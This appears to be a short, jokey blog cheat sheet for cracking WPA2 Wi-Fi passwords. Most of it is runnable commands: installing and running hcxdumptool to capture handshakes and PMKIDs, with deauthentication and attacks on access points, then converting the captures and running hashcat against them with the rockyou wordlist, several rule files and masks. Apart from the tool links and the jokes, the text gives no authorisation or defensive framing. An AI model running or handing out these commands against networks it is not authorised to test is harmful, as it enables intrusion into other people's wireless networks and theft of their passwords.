Wireless Penetration

Posted without comment (no pun intended)

Don’t try this at home, kids!

Random Musing: this could probably be done on a Pi or similar.

Inside Jokers’ Lair

• Boot Kali Light

• As of 2019.03:

  apt-get update && \
  apt-get -y upgrade && \ 
  apt-get install -y gcc git make \ 
                     libcurl4-openssl-dev libssl-dev zlib1g-dev         
  
  git clone https://github.com/ZerBea/hcxdumptool && \ 
            cd hcxdumptool && \
            make install
  
  # run for 30 secs to confirm capabilities
  hcxdumptool -i interface --do_rcascan          
  
  # you can add --filterlist=<file> or --ap_mac=<mac_addr>
  # default scan list: 1, 3, 5, 7, 9, 11, 13, 2, 4, 6, 8, 10, 12, 13
  hcxdumptool -i wlp39s0f3u4u5 -o haktheplanet.cap \
              -T 5 -t 90 -D 100 -A 100 \
              --give_up_ap_attacks=10 \
              --give_up_deauthentications=10 \
              --reactive_beacon \
              --enable_status=3 
  
  # convert to usable format(s)
  hcxpcaptool -k haktheplanet.pmkid haktheplanet.cap 
  hcxpcaptool -o haktheplanet.hashcat haktheplanet.cap 
  hcxpcaptool -O haktheplanet.raw.hashcat haktheplanet.cap 

Back At The Bat Cave

• Hashmode: 2500

  GPU	kH/s
  RX5700XT	474.1
  GTX1070	297.8
  RX580	224.0

• Use -m 16800 for PMKIDs or -m 2500 regular hashcats

  curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/  download/data/rockyou.txt
  
  # low hanging fruit, how does this still work lulz
  hashcat -m 2500 -a 0 haktheplanet.hashcat rockyou.txt --potfile-path   haktheplanet.naive.win
  
  # kay time for rules
  hashcat -m 2500 -a 0 haktheplanet.hashcat rockyou.txt -r ./rules/d3ad0ne.rule   --potfile-path haktheplanet.deadone.win
  
  # this isnt the slowest
  hashcat -m 2500 -a 0 haktheplanet.hashcat rockyou.txt -r ./rules/rockyou-30000.rule   --potfile-path      haktheplanet.rocku.win
  
  # dive isnt fast
  hashcat -m 2500 -a 0 haktheplanet.hashcat rockyou.txt -r ./rules/dive.rule   --potfile-path haktheplanet.dive.win
  
  # GLHF ¯\_(ツ)_/¯
  hashcat -m 2500 -a 3 haktheplanet.hashcat ./masks/rockyou-1-60.hcmask --potfile-path   haktheplanet.mask.win

Reference

• 101
  
• PMKID (2010)
  
• Docker All The Things!
  
• WPA2 Dead Yo
  
• AC Config
  
• Everything Else
  
  

Notable Mentions

• https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Docker%20Linux
  
• https://www.willhackforsushi.com/?page_id=50
  
• https://github.com/edthamm/lootbooty
  
• https://github.com/InfamousSYN/rogue
  
• pyrit, tshark, cowpatty, aircrack-ng: https://github.com/derv82/wifite2
  
• Josh Hoover n PunK1nPO0P DEFCON21: Why Corporate Wireless Security Still Sucks